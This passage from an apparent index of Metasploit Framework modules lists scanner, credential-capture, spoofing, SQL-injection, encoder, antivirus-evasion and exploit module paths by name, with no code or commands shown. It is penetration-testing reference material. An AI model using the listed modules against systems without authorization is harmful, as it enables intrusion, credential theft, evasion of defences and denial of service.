auxiliary/scanner/http/http_put | auxiliary/scanner/http/http_sickrage_password_leak | auxiliary/scanner/http/http_traversal | auxiliary/scanner/http/http_version | auxiliary/scanner/http/httpbl_lookup | auxiliary/scanner/http/httpdasm_directory_traversal | auxiliary/scanner/http/icinga_static_library_file_directory_traversal | auxiliary/scanner/http/iis_internal_ip | auxiliary/scanner/http/iis_shortname_scanner | auxiliary/scanner/http/influxdb_enum | auxiliary/scanner/http/infovista_enum | auxiliary/scanner/http/intel_amt_digest_bypass | auxiliary/scanner/http/ipboard_login | auxiliary/scanner/http/jboss_status | auxiliary/scanner/http/jboss_vulnscan | auxiliary/scanner/http/jenkins_command | auxiliary/scanner/http/jenkins_enum | auxiliary/scanner/http/jenkins_login | auxiliary/scanner/http/jira_user_enum | auxiliary/scanner/http/joomla_api_improper_access_checks | auxiliary/scanner/http/joomla_bruteforce_login | auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner | auxiliary/scanner/http/joomla_gallerywd_sqli_scanner | auxiliary/scanner/http/joomla_pages | auxiliary/scanner/http/joomla_plugins | auxiliary/scanner/http/joomla_version | auxiliary/scanner/http/jupyter_login | auxiliary/scanner/http/kodi_traversal | auxiliary/scanner/http/limesurvey_zip_traversals | auxiliary/scanner/http/linknat_vos_traversal | auxiliary/scanner/http/linksys_e1500_traversal | auxiliary/scanner/http/litespeed_source_disclosure | auxiliary/scanner/http/log4shell_scanner | auxiliary/scanner/http/lucky_punch | auxiliary/scanner/http/majordomo2_directory_traversal | auxiliary/scanner/http/manageengine_desktop_central_login | auxiliary/scanner/http/manageengine_deviceexpert_traversal | auxiliary/scanner/http/manageengine_deviceexpert_user_creds | auxiliary/scanner/http/manageengine_securitymanager_traversal | auxiliary/scanner/http/mediawiki_svg_fileaccess | auxiliary/scanner/http/meteocontrol_weblog_extractadmin | auxiliary/scanner/http/mod_negotiation_brute | auxiliary/scanner/http/mod_negotiation_scanner | auxiliary/scanner/http/ms09_020_webdav_unicode_bypass | auxiliary/scanner/http/ms15_034_http_sys_memory_dump | auxiliary/scanner/http/mybook_live_login | auxiliary/scanner/http/nagios_xi_scanner | auxiliary/scanner/http/netdecision_traversal | auxiliary/scanner/http/netgear_sph200d_traversal | auxiliary/scanner/http/nginx_source_disclosure | auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess | auxiliary/scanner/http/novell_file_reporter_srs_fileaccess | auxiliary/scanner/http/novell_mdm_creds | auxiliary/scanner/http/ntlm_info_enumeration | auxiliary/scanner/http/octopusdeploy_login | auxiliary/scanner/http/onion_omega2_login | auxiliary/scanner/http/open_proxy | auxiliary/scanner/http/openmind_messageos_login | auxiliary/scanner/http/options | auxiliary/scanner/http/oracle_demantra_database_credentials_leak | auxiliary/scanner/http/oracle_demantra_file_retrieval | auxiliary/scanner/http/oracle_ilom_login | auxiliary/scanner/http/owa_ews_login | auxiliary/scanner/http/owa_iis_internal_ip | auxiliary/scanner/http/owa_login | auxiliary/scanner/http/phpmyadmin_login | auxiliary/scanner/http/pocketpad_login | auxiliary/scanner/http/prev_dir_same_name_file | auxiliary/scanner/http/radware_appdirector_enum | auxiliary/scanner/http/rails_json_yaml_scanner | auxiliary/scanner/http/rails_mass_assignment | auxiliary/scanner/http/rails_xml_yaml_scanner | auxiliary/scanner/http/rdp_web_login | auxiliary/scanner/http/replace_ext | auxiliary/scanner/http/rewrite_proxy_bypass | auxiliary/scanner/http/rfcode_reader_enum | auxiliary/scanner/http/rips_traversal | auxiliary/scanner/http/riverbed_steelhead_vcx_file_read | auxiliary/scanner/http/robots_txt | auxiliary/scanner/http/rpyc_rce | auxiliary/scanner/http/s40_traversal | auxiliary/scanner/http/sap_businessobjects_user_brute | auxiliary/scanner/http/sap_businessobjects_user_brute_web | auxiliary/scanner/http/sap_businessobjects_user_enum | auxiliary/scanner/http/sap_businessobjects_version_enum | auxiliary/scanner/http/scraper | auxiliary/scanner/http/sentry_cdu_enum | auxiliary/scanner/http/servicedesk_plus_traversal | auxiliary/scanner/http/sevone_enum | auxiliary/scanner/http/simple_webserver_traversal | auxiliary/scanner/http/smt_ipmi_49152_exposure | auxiliary/scanner/http/smt_ipmi_cgi_scanner | auxiliary/scanner/http/smt_ipmi_static_cert_scanner | auxiliary/scanner/http/smt_ipmi_url_redirect_traversal | auxiliary/scanner/http/soap_xml | auxiliary/scanner/http/sockso_traversal | auxiliary/scanner/http/softing_sis_login | auxiliary/scanner/http/splunk_web_login | auxiliary/scanner/http/springcloud_directory_traversal | auxiliary/scanner/http/springcloud_traversal | auxiliary/scanner/http/squid_pivot_scanning | auxiliary/scanner/http/squiz_matrix_user_enum | auxiliary/scanner/http/support_center_plus_directory_traversal | auxiliary/scanner/http/surgenews_user_creds | auxiliary/scanner/http/svn_scanner | auxiliary/scanner/http/svn_wcdb_scanner | auxiliary/scanner/http/sybase_easerver_traversal | auxiliary/scanner/http/symantec_brightmail_ldapcreds | auxiliary/scanner/http/symantec_brightmail_logfile | auxiliary/scanner/http/symantec_web_gateway_login | auxiliary/scanner/http/syncovery_linux_login | auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536 | auxiliary/scanner/http/synology_forget_passwd_user_enum | auxiliary/scanner/http/telerik_report_server_auth_bypass | auxiliary/scanner/http/thinvnc_traversal | auxiliary/scanner/http/titan_ftp_admin_pwd | auxiliary/scanner/http/title | auxiliary/scanner/http/tomcat_enum | auxiliary/scanner/http/tomcat_mgr_login | auxiliary/scanner/http/totaljs_traversal | auxiliary/scanner/http/tplink_traversal_noauth | auxiliary/scanner/http/trace | auxiliary/scanner/http/trace_axd | auxiliary/scanner/http/tvt_nvms_traversal | auxiliary/scanner/http/typo3_bruteforce | auxiliary/scanner/http/vcms_login | auxiliary/scanner/http/verb_auth_bypass | auxiliary/scanner/http/vhost_scanner | auxiliary/scanner/http/vicidial_multiple_sqli | auxiliary/scanner/http/vicidial_sql_enum_users_pass | auxiliary/scanner/http/wangkongbao_traversal | auxiliary/scanner/http/web_vulndb | auxiliary/scanner/http/webdav_internal_ip | auxiliary/scanner/http/webdav_scanner | auxiliary/scanner/http/webdav_website_content | auxiliary/scanner/http/webpagetest_traversal | auxiliary/scanner/http/wildfly_traversal | auxiliary/scanner/http/wordpress_content_injection | auxiliary/scanner/http/wordpress_cp_calendar_sqli | auxiliary/scanner/http/wordpress_ghost_scanner | auxiliary/scanner/http/wordpress_login_enum | auxiliary/scanner/http/wordpress_multicall_creds | auxiliary/scanner/http/wordpress_pingback_access | auxiliary/scanner/http/wordpress_scanner | auxiliary/scanner/http/wordpress_xmlrpc_login | auxiliary/scanner/http/wowza_streaming_engine_manager_login | auxiliary/scanner/http/wp_abandoned_cart_sqli | auxiliary/scanner/http/wp_arbitrary_file_deletion | auxiliary/scanner/http/wp_bulletproofsecurity_backups | auxiliary/scanner/http/wp_chopslider_id_sqli | auxiliary/scanner/http/wp_contus_video_gallery_sqli | auxiliary/scanner/http/wp_dukapress_file_read | auxiliary/scanner/http/wp_duplicator_file_read | auxiliary/scanner/http/wp_easy_wp_smtp | auxiliary/scanner/http/wp_email_sub_news_sqli | auxiliary/scanner/http/wp_fastest_cache_sqli | auxiliary/scanner/http/wp_gimedia_library_file_read | auxiliary/scanner/http/wp_learnpress_c_fields_sqli | auxiliary/scanner/http/wp_learnpress_sqli | auxiliary/scanner/http/wp_loginizer_log_sqli | auxiliary/scanner/http/wp_mobile_pack_info_disclosure | auxiliary/scanner/http/wp_mobileedition_file_read | auxiliary/scanner/http/wp_modern_events_calendar_sqli | auxiliary/scanner/http/wp_nextgen_galley_file_read | auxiliary/scanner/http/wp_paid_membership_pro_code_sqli | auxiliary/scanner/http/wp_registrationmagic_sqli | auxiliary/scanner/http/wp_secure_copy_content_protection_sqli | auxiliary/scanner/http/wp_simple_backup_file_read | auxiliary/scanner/http/wp_subscribe_comments_file_read | auxiliary/scanner/http/wp_total_upkeep_downloader | auxiliary/scanner/http/wp_woocommerce_payments_add_user | auxiliary/scanner/http/wp_wps_hide_login_revealer | auxiliary/scanner/http/xpath | auxiliary/scanner/http/yaws_traversal | auxiliary/scanner/http/zabbix_login | auxiliary/scanner/http/zenload_balancer_traversal | auxiliary/scanner/http/zenworks_assetmanagement_fileaccess | auxiliary/scanner/http/zenworks_assetmanagement_getconfig | . | ike (1) . | auxiliary/scanner/ike/cisco_ike_benigncertain | . | imap (1) . | auxiliary/scanner/imap/imap_version | . | ip (1) . | auxiliary/scanner/ip/ipidseq | . | ipmi (3) . | auxiliary/scanner/ipmi/ipmi_cipher_zero | auxiliary/scanner/ipmi/ipmi_dumphashes | auxiliary/scanner/ipmi/ipmi_version | . | jenkins (1) . | auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum | . | kademlia (1) . | auxiliary/scanner/kademlia/server_info | . | kerberos (1) . | auxiliary/scanner/kerberos/kerberos_login | . | ldap (1) . | auxiliary/scanner/ldap/ldap_login | . | llmnr (1) . | auxiliary/scanner/llmnr/query | . | lotus (3) . | auxiliary/scanner/lotus/lotus_domino_hashes | auxiliary/scanner/lotus/lotus_domino_login | auxiliary/scanner/lotus/lotus_domino_version | . | mdns (1) . | auxiliary/scanner/mdns/query | . | memcached (2) . | auxiliary/scanner/memcached/memcached_amp | auxiliary/scanner/memcached/memcached_udp_version | . | misc (22) . | auxiliary/scanner/misc/cctv_dvr_login | auxiliary/scanner/misc/cisco_smart_install | auxiliary/scanner/misc/clamav_control | auxiliary/scanner/misc/cups_browsed_info_disclosure | auxiliary/scanner/misc/dahua_dvr_auth_bypass | auxiliary/scanner/misc/dvr_config_disclosure | auxiliary/scanner/misc/easycafe_server_fileaccess | auxiliary/scanner/misc/freeswitch_event_socket_login | auxiliary/scanner/misc/ib_service_mgr_info | auxiliary/scanner/misc/ibm_mq_channel_brute | auxiliary/scanner/misc/ibm_mq_enum | auxiliary/scanner/misc/ibm_mq_login | auxiliary/scanner/misc/java_jmx_server | auxiliary/scanner/misc/java_rmi_server | auxiliary/scanner/misc/oki_scanner | auxiliary/scanner/misc/poisonivy_control_scanner | auxiliary/scanner/misc/raysharp_dvr_passwords | auxiliary/scanner/misc/rocketmq_version | auxiliary/scanner/misc/rosewill_rxs3211_passwords | auxiliary/scanner/misc/sercomm_backdoor_scanner | auxiliary/scanner/misc/sunrpc_portmapper | auxiliary/scanner/misc/zenworks_preboot_fileaccess | . | mongodb (1) . | auxiliary/scanner/mongodb/mongodb_login | . | motorola (1) . | auxiliary/scanner/motorola/timbuktu_udp | . | mqtt (1) . | auxiliary/scanner/mqtt/connect | . | msf (2) . | auxiliary/scanner/msf/msf_rpc_login | auxiliary/scanner/msf/msf_web_login | . | msmail (3) . | auxiliary/scanner/msmail/exchange_enum | auxiliary/scanner/msmail/host_id | auxiliary/scanner/msmail/onprem_enum | . | msmq (1) . | auxiliary/scanner/msmq/cve_2023_21554_queuejumper | . | mssql (5) . | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/scanner/mssql/mssql_login | auxiliary/scanner/mssql/mssql_ping | auxiliary/scanner/mssql/mssql_schemadump | auxiliary/scanner/mssql/mssql_version | . | mysql (7) . | auxiliary/scanner/mysql/mysql_authbypass_hashdump | auxiliary/scanner/mysql/mysql_file_enum | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/scanner/mysql/mysql_login | auxiliary/scanner/mysql/mysql_schemadump | auxiliary/scanner/mysql/mysql_version | auxiliary/scanner/mysql/mysql_writable_dirs | . | natpmp (1) . | auxiliary/scanner/natpmp/natpmp_portscan | . | nessus (4) . | auxiliary/scanner/nessus/nessus_ntp_login | auxiliary/scanner/nessus/nessus_rest_login | auxiliary/scanner/nessus/nessus_xmlrpc_login | auxiliary/scanner/nessus/nessus_xmlrpc_ping | . | netbios (1) . | auxiliary/scanner/netbios/nbname | . | nexpose (1) . | auxiliary/scanner/nexpose/nexpose_api_login | . | nfs (1) . | auxiliary/scanner/nfs/nfsmount | . | nntp (1) . | auxiliary/scanner/nntp/nntp_login | . | ntp (8) . | auxiliary/scanner/ntp/ntp_monlist | auxiliary/scanner/ntp/ntp_nak_to_the_future | auxiliary/scanner/ntp/ntp_peer_list_dos | auxiliary/scanner/ntp/ntp_peer_list_sum_dos | auxiliary/scanner/ntp/ntp_readvar | auxiliary/scanner/ntp/ntp_req_nonce_dos | auxiliary/scanner/ntp/ntp_reslist_dos | auxiliary/scanner/ntp/ntp_unsettrap_dos | . | openvas (3) . | auxiliary/scanner/openvas/openvas_gsad_login | auxiliary/scanner/openvas/openvas_omp_login | auxiliary/scanner/openvas/openvas_otp_login | . | oracle (12) . | auxiliary/scanner/oracle/emc_sid | auxiliary/scanner/oracle/isqlplus_login | auxiliary/scanner/oracle/isqlplus_sidbrute | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/scanner/oracle/oracle_login | auxiliary/scanner/oracle/sid_brute | auxiliary/scanner/oracle/sid_enum | auxiliary/scanner/oracle/spy_sid | auxiliary/scanner/oracle/tnslsnr_version | auxiliary/scanner/oracle/tnspoison_checker | auxiliary/scanner/oracle/xdb_sid | auxiliary/scanner/oracle/xdb_sid_brute | . | pcanywhere (3) . | auxiliary/scanner/pcanywhere/pcanywhere_login | auxiliary/scanner/pcanywhere/pcanywhere_tcp | auxiliary/scanner/pcanywhere/pcanywhere_udp | . | pop3 (2) . | auxiliary/scanner/pop3/pop3_login | auxiliary/scanner/pop3/pop3_version | . | portmap (1) . | auxiliary/scanner/portmap/portmap_amp | . | portscan (5) . | auxiliary/scanner/portscan/ack | auxiliary/scanner/portscan/ftpbounce | auxiliary/scanner/portscan/syn | auxiliary/scanner/portscan/tcp | auxiliary/scanner/portscan/xmas | . | postgres (5) . | auxiliary/scanner/postgres/postgres_dbname_flag_injection | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/scanner/postgres/postgres_login | auxiliary/scanner/postgres/postgres_schemadump | auxiliary/scanner/postgres/postgres_version | . | printer (9) . | auxiliary/scanner/printer/canon_iradv_pwd_extract | auxiliary/scanner/printer/printer_delete_file | auxiliary/scanner/printer/printer_download_file | auxiliary/scanner/printer/printer_env_vars | auxiliary/scanner/printer/printer_list_dir | auxiliary/scanner/printer/printer_list_volumes | auxiliary/scanner/printer/printer_ready_message | auxiliary/scanner/printer/printer_upload_file | auxiliary/scanner/printer/printer_version_info | . | quake (1) . | auxiliary/scanner/quake/server_info | . | rdp (3) . | auxiliary/scanner/rdp/cve_2019_0708_bluekeep | auxiliary/scanner/rdp/ms12_020_check | auxiliary/scanner/rdp/rdp_scanner | . | redis (3) . | auxiliary/scanner/redis/file_upload | auxiliary/scanner/redis/redis_login | auxiliary/scanner/redis/redis_server | . | rogue (2) . | auxiliary/scanner/rogue/rogue_recv | auxiliary/scanner/rogue/rogue_send | . | rservices (3) . | auxiliary/scanner/rservices/rexec_login | auxiliary/scanner/rservices/rlogin_login | auxiliary/scanner/rservices/rsh_login | . | rsync (1) . | auxiliary/scanner/rsync/modules_list | . | sage (1) . | auxiliary/scanner/sage/x3_adxsrv_login | . | sap (36) . | auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt | auxiliary/scanner/sap/sap_hostctrl_getcomputersystem | auxiliary/scanner/sap/sap_icf_public_info | auxiliary/scanner/sap/sap_icm_urlscan | auxiliary/scanner/sap/sap_mgmt_con_abaplog | auxiliary/scanner/sap/sap_mgmt_con_brute_login | auxiliary/scanner/sap/sap_mgmt_con_extractusers | auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints | auxiliary/scanner/sap/sap_mgmt_con_getenv | auxiliary/scanner/sap/sap_mgmt_con_getlogfiles | auxiliary/scanner/sap/sap_mgmt_con_getprocesslist | auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter | auxiliary/scanner/sap/sap_mgmt_con_instanceproperties | auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles | auxiliary/scanner/sap/sap_mgmt_con_listlogfiles | auxiliary/scanner/sap/sap_mgmt_con_startprofile | auxiliary/scanner/sap/sap_mgmt_con_version | auxiliary/scanner/sap/sap_router_info_request | auxiliary/scanner/sap/sap_router_portscanner | auxiliary/scanner/sap/sap_service_discovery | auxiliary/scanner/sap/sap_smb_relay | auxiliary/scanner/sap/sap_soap_bapi_user_create1 | auxiliary/scanner/sap/sap_soap_rfc_brute_login | auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec | auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec | auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing | auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence | auxiliary/scanner/sap/sap_soap_rfc_ping | auxiliary/scanner/sap/sap_soap_rfc_read_table | auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir | auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface | auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec | auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec | auxiliary/scanner/sap/sap_soap_rfc_system_info | auxiliary/scanner/sap/sap_soap_th_saprel_disclosure | auxiliary/scanner/sap/sap_web_gui_brute_login | . | scada (15) . | auxiliary/scanner/scada/bacnet_l3 | auxiliary/scanner/scada/digi_addp_reboot | auxiliary/scanner/scada/digi_addp_version | auxiliary/scanner/scada/digi_realport_serialport_scan | auxiliary/scanner/scada/digi_realport_version | auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess | auxiliary/scanner/scada/koyo_login | auxiliary/scanner/scada/modbus_banner_grabbing | auxiliary/scanner/scada/modbus_findunitid | auxiliary/scanner/scada/modbusclient | auxiliary/scanner/scada/modbusdetect | auxiliary/scanner/scada/moxa_discover | auxiliary/scanner/scada/pcomclient | auxiliary/scanner/scada/profinet_siemens | auxiliary/scanner/scada/sielco_winlog_fileaccess | . | sip (5) . | auxiliary/scanner/sip/enumerator | auxiliary/scanner/sip/enumerator_tcp | auxiliary/scanner/sip/options | auxiliary/scanner/sip/options_tcp | auxiliary/scanner/sip/sipdroid_ext_enum | . | smb (15) . | impacket (3) . | auxiliary/scanner/smb/impacket/dcomexec | auxiliary/scanner/smb/impacket/secretsdump | auxiliary/scanner/smb/impacket/wmiexec | . | auxiliary/scanner/smb/pipe_auditor | auxiliary/scanner/smb/pipe_dcerpc_auditor | auxiliary/scanner/smb/psexec_loggedin_users | auxiliary/scanner/smb/smb_enum_gpp | auxiliary/scanner/smb/smb_enumshares | auxiliary/scanner/smb/smb_enumusers | auxiliary/scanner/smb/smb_enumusers_domain | auxiliary/scanner/smb/smb_login | auxiliary/scanner/smb/smb_lookupsid | auxiliary/scanner/smb/smb_ms17_010 | auxiliary/scanner/smb/smb_uninit_cred | auxiliary/scanner/smb/smb_version | . | smtp (4) . | auxiliary/scanner/smtp/smtp_enum | auxiliary/scanner/smtp/smtp_ntlm_domain | auxiliary/scanner/smtp/smtp_relay | auxiliary/scanner/smtp/smtp_version | . | snmp (17) . | auxiliary/scanner/snmp/aix_version | auxiliary/scanner/snmp/arris_dg950 | auxiliary/scanner/snmp/brocade_enumhash | auxiliary/scanner/snmp/cisco_config_tftp | auxiliary/scanner/snmp/cisco_upload_file | auxiliary/scanner/snmp/cnpilot_r_snmp_loot | auxiliary/scanner/snmp/epmp1000_snmp_loot | auxiliary/scanner/snmp/netopia_enum | auxiliary/scanner/snmp/sbg6580_enum | auxiliary/scanner/snmp/snmp_enum | auxiliary/scanner/snmp/snmp_enum_hp_laserjet | auxiliary/scanner/snmp/snmp_enumshares | auxiliary/scanner/snmp/snmp_enumusers | auxiliary/scanner/snmp/snmp_login | auxiliary/scanner/snmp/snmp_set | auxiliary/scanner/snmp/ubee_ddw3611 | auxiliary/scanner/snmp/xerox_workcentre_enumusers | . | ssh (14) . | auxiliary/scanner/ssh/apache_karaf_command_execution | auxiliary/scanner/ssh/cerberus_sftp_enumusers | auxiliary/scanner/ssh/detect_kippo | auxiliary/scanner/ssh/eaton_xpert_backdoor | auxiliary/scanner/ssh/fortinet_backdoor | auxiliary/scanner/ssh/juniper_backdoor | auxiliary/scanner/ssh/karaf_login | auxiliary/scanner/ssh/libssh_auth_bypass | auxiliary/scanner/ssh/ssh_enum_git_keys | auxiliary/scanner/ssh/ssh_enumusers | auxiliary/scanner/ssh/ssh_identify_pubkeys | auxiliary/scanner/ssh/ssh_login | auxiliary/scanner/ssh/ssh_login_pubkey | auxiliary/scanner/ssh/ssh_version | . | ssl (4) . | auxiliary/scanner/ssl/bleichenbacher_oracle | auxiliary/scanner/ssl/openssl_ccs | auxiliary/scanner/ssl/openssl_heartbleed | auxiliary/scanner/ssl/ssl_version | . | steam (1) . | auxiliary/scanner/steam/server_info | . | telephony (1) . | auxiliary/scanner/telephony/wardial | . | telnet (8) . | auxiliary/scanner/telnet/brocade_enable_login | auxiliary/scanner/telnet/lantronix_telnet_password | auxiliary/scanner/telnet/lantronix_telnet_version | auxiliary/scanner/telnet/satel_cmd_exec | auxiliary/scanner/telnet/telnet_encrypt_overflow | auxiliary/scanner/telnet/telnet_login | auxiliary/scanner/telnet/telnet_ruggedcom | auxiliary/scanner/telnet/telnet_version | . | teradata (1) . | auxiliary/scanner/teradata/teradata_odbc_login | . | tftp (3) . | auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp | auxiliary/scanner/tftp/netdecision_tftp | auxiliary/scanner/tftp/tftpbrute | . | ubiquiti (1) . | auxiliary/scanner/ubiquiti/ubiquiti_discover | . | udp (1) . | auxiliary/scanner/udp/udp_amplification | . | upnp (2) . | auxiliary/scanner/upnp/ssdp_amp | auxiliary/scanner/upnp/ssdp_msearch | . | varnish (2) . | auxiliary/scanner/varnish/varnish_cli_file_read | auxiliary/scanner/varnish/varnish_cli_login | . | vmware (12) . | auxiliary/scanner/vmware/esx_fingerprint | auxiliary/scanner/vmware/vmauthd_login | auxiliary/scanner/vmware/vmauthd_version | auxiliary/scanner/vmware/vmware_enum_permissions | auxiliary/scanner/vmware/vmware_enum_sessions | auxiliary/scanner/vmware/vmware_enum_users | auxiliary/scanner/vmware/vmware_enum_vms | auxiliary/scanner/vmware/vmware_host_details | auxiliary/scanner/vmware/vmware_http_login | auxiliary/scanner/vmware/vmware_screenshot_stealer | auxiliary/scanner/vmware/vmware_server_dir_trav | auxiliary/scanner/vmware/vmware_update_manager_traversal | . | vnc (3) . | auxiliary/scanner/vnc/ard_root_pw | auxiliary/scanner/vnc/vnc_login | auxiliary/scanner/vnc/vnc_none_auth | . | voice (1) . | auxiliary/scanner/voice/recorder | . | vxworks (3) . | auxiliary/scanner/vxworks/urgent11_check | auxiliary/scanner/vxworks/wdbrpc_bootline | auxiliary/scanner/vxworks/wdbrpc_version | . | winrm (4) . | auxiliary/scanner/winrm/winrm_auth_methods | auxiliary/scanner/winrm/winrm_cmd | auxiliary/scanner/winrm/winrm_login | auxiliary/scanner/winrm/winrm_wql | . | wproxy (1) . | auxiliary/scanner/wproxy/att_open_proxy | . | wsdd (1) . | auxiliary/scanner/wsdd/wsdd_query | . | x11 (1) . | auxiliary/scanner/x11/open_x11 | . | . | server (46) . | capture (18) . | auxiliary/server/capture/drda | auxiliary/server/capture/ftp | auxiliary/server/capture/http | auxiliary/server/capture/http_basic | auxiliary/server/capture/http_javascript_keylogger | auxiliary/server/capture/http_ntlm | auxiliary/server/capture/imap | auxiliary/server/capture/ldap | auxiliary/server/capture/mssql | auxiliary/server/capture/mysql | auxiliary/server/capture/pop3 | auxiliary/server/capture/postgresql | auxiliary/server/capture/printjob_capture | auxiliary/server/capture/sip | auxiliary/server/capture/smb | auxiliary/server/capture/smtp | auxiliary/server/capture/telnet | auxiliary/server/capture/vnc | . | dns (2) . | auxiliary/server/dns/native_server | auxiliary/server/dns/spoofhelper | . | auxiliary/server/android_browsable_msf_launch | auxiliary/server/android_mercury_parseuri | auxiliary/server/browser_autopwn | auxiliary/server/browser_autopwn2 | auxiliary/server/dhclient_bash_env | auxiliary/server/dhcp | auxiliary/server/fakedns | auxiliary/server/ftp | auxiliary/server/http_ntlmrelay | auxiliary/server/icmp_exfil | auxiliary/server/jsse_skiptls_mitm_proxy | auxiliary/server/ldap | auxiliary/server/local_hwbridge | auxiliary/server/ms15_134_mcl_leak | auxiliary/server/netbios_spoof_nat | auxiliary/server/openssl_altchainsforgery_mitm_proxy | auxiliary/server/openssl_heartbeat_client_memory | auxiliary/server/pxeexploit | auxiliary/server/regsvr32_command_delivery_server | auxiliary/server/socks_proxy | auxiliary/server/socks_unc | auxiliary/server/teamviewer_uri_smb_redirect | auxiliary/server/tftp | auxiliary/server/webkit_xslt_dropper | auxiliary/server/wget_symlink_file_write | auxiliary/server/wpad | . | sniffer (1) . | auxiliary/sniffer/psnuffle | . | spoof (11) . | arp (1) . | auxiliary/spoof/arp/arp_poisoning | . | cisco (2) . | auxiliary/spoof/cisco/cdp | auxiliary/spoof/cisco/dtp | . | dns (4) . | auxiliary/spoof/dns/bailiwicked_domain | auxiliary/spoof/dns/bailiwicked_host | auxiliary/spoof/dns/compare_results | auxiliary/spoof/dns/native_spoofer | . | llmnr (1) . | auxiliary/spoof/llmnr/llmnr_response | . | mdns (1) . | auxiliary/spoof/mdns/mdns_response | . | nbns (1) . | auxiliary/spoof/nbns/nbns_response | . | replay (1) . | auxiliary/spoof/replay/pcap_replay | . | . | sqli (19) . | dlink (1) . | auxiliary/sqli/dlink/dlink_central_wifimanager_sqli | . | openemr (1) . | auxiliary/sqli/openemr/openemr_sqli_dump | . | oracle (17) . | auxiliary/sqli/oracle/dbms_cdc_ipublish | auxiliary/sqli/oracle/dbms_cdc_publish | auxiliary/sqli/oracle/dbms_cdc_publish2 | auxiliary/sqli/oracle/dbms_cdc_publish3 | auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription | auxiliary/sqli/oracle/dbms_export_extension | auxiliary/sqli/oracle/dbms_metadata_get_granted_xml | auxiliary/sqli/oracle/dbms_metadata_get_xml | auxiliary/sqli/oracle/dbms_metadata_open | auxiliary/sqli/oracle/droptable_trigger | auxiliary/sqli/oracle/jvm_os_code_10g | auxiliary/sqli/oracle/jvm_os_code_11g | auxiliary/sqli/oracle/lt_compressworkspace | auxiliary/sqli/oracle/lt_findricset_cursor | auxiliary/sqli/oracle/lt_mergeworkspace | auxiliary/sqli/oracle/lt_removeworkspace | auxiliary/sqli/oracle/lt_rollbackworkspace | . | . | voip (6) . | auxiliary/voip/asterisk_login | auxiliary/voip/cisco_cucdm_call_forward | auxiliary/voip/cisco_cucdm_speed_dials | auxiliary/voip/sip_deregister | auxiliary/voip/sip_invite_spoof | auxiliary/voip/telisca_ips_lock_control | . | vsploit (5) . | malware (3) . | dns (3) . | auxiliary/vsploit/malware/dns/dns_mariposa | auxiliary/vsploit/malware/dns/dns_query | auxiliary/vsploit/malware/dns/dns_zeus | . | . | pii (2) . | auxiliary/vsploit/pii/email_pii | auxiliary/vsploit/pii/web_pii | . | . | . | encoder (49) . | cmd (8) . | encoder/cmd/base64 | encoder/cmd/brace | encoder/cmd/echo | encoder/cmd/generic_sh | encoder/cmd/ifs | encoder/cmd/perl | encoder/cmd/powershell_base64 | encoder/cmd/printf_php_mq | . | generic (2) . | encoder/generic/eicar | encoder/generic/none | . | mipsbe (2) . | encoder/mipsbe/byte_xori | encoder/mipsbe/longxor | . | mipsle (2) . | encoder/mipsle/byte_xori | encoder/mipsle/longxor | . | php (3) . | encoder/php/base64 | encoder/php/hex | encoder/php/minify | . | ppc (2) . | encoder/ppc/longxor | encoder/ppc/longxor_tag | . | ruby (1) . | encoder/ruby/base64 | . | sparc (1) . | encoder/sparc/longxor_tag | . | x64 (4) . | encoder/x64/xor | encoder/x64/xor_context | encoder/x64/xor_dynamic | encoder/x64/zutto_dekiru | . | x86 (24) . | encoder/x86/add_sub | encoder/x86/alpha_mixed | encoder/x86/alpha_upper | encoder/x86/avoid_underscore_tolower | encoder/x86/avoid_utf8_tolower | encoder/x86/bloxor | encoder/x86/bmp_polyglot | encoder/x86/call4_dword_xor | encoder/x86/context_cpuid | encoder/x86/context_stat | encoder/x86/context_time | encoder/x86/countdown | encoder/x86/fnstenv_mov | encoder/x86/jmp_call_additive | encoder/x86/nonalpha | encoder/x86/nonupper | encoder/x86/opt_sub | encoder/x86/service | encoder/x86/shikata_ga_nai | encoder/x86/single_static_bit | encoder/x86/unicode_mixed | encoder/x86/unicode_upper | encoder/x86/xor_dynamic | encoder/x86/xor_poly | . | . | evasion (9) . | windows (9) . | evasion/windows/applocker_evasion_install_util | evasion/windows/applocker_evasion_msbuild | evasion/windows/applocker_evasion_presentationhost | evasion/windows/applocker_evasion_regasm_regsvcs | evasion/windows/applocker_evasion_workflow_compiler | evasion/windows/process_herpaderping | evasion/windows/syscall_inject | evasion/windows/windows_defender_exe | evasion/windows/windows_defender_js_hta | . | . | exploit (2460) . | aix (5) . | local (3) . | exploit/aix/local/ibstat_path | exploit/aix/local/invscout_rpm_priv_esc | exploit/aix/local/xorg_x11_server | . | exploit/aix/rpc_cmsd_opcode21 | exploit/aix/rpc_ttdbserverd_realpath | . | android (10) . | adb (1) . | exploit/android/adb/adb_server_exec | . | browser (3) . | exploit/android/browser/samsung_knox_smdm_url | exploit/android/browser/stagefright_mp4_tx3g_64bit | exploit/android/browser/webview_addjavascriptinterface | . | fileformat (1) . | exploit/android/fileformat/adobe_reader_pdf_js_interface | . | local (5) . | exploit/android/local/binder_uaf | exploit/android/local/futex_requeue | exploit/android/local/janus | exploit/android/local/put_user_vroot | exploit/android/local/su_exec | . | . | apple_ios (6) . | browser (4) . | exploit/apple_ios/browser/safari_jit | exploit/apple_ios/browser/safari_libtiff | exploit/apple_ios/browser/webkit_createthis | exploit/apple_ios/browser/webkit_trident | . | email (1) . | 